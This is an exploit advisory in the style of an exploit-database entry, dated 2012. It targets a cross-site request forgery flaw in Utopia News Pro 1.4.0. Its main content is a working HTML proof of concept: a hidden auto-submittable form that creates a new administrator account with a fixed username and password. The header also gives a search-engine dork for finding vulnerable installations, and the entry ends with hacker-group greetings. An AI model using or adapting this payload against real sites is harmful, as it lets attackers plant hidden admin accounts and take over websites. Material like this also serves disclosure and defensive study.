# Exploit Title: Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability # Date: 7/4/2012 # Author: Dr.NaNo # Software Link: http://www.utopiasoftware.net/newspro/dl.php?filename=newspro140b.zip&mirror=1 # Version: 1.4.0 # Tested on: Linux-Red-Hat # Google Dork: Powered By Utopia News Pro 1.4.0 # ######################################################## # ~ Exploit ~ # ######################################################## <html> <body> <form action="http://localhost/{PATh}/upload/users.php" method="post" /> <input type="hidden" name="username" value="NANO" /> <input type="hidden" name="groupid" value="1" /> <input type="hidden" name="password" value="102030" /> <input type="hidden" name="password2" value="102030" /> <input type="hidden" name="email" value="security@security.com" /> <input type="submit" name="submitnew" accesskey="s" value="ThankS !" /> </form> </body> </html> #### ~ Greetz ~ ######################################################### # # # Dr.WEP , JIKO , ahwak2000 , RENO , ABU NWAF , Dr.HAiL , snc0pe , 020 # # # # JaBrOt HaCkEr , alkaseer20 , SadHaCkEr , Cyber Code , aircrack -ng # # # ############################################### ~ All FriendS ~ #########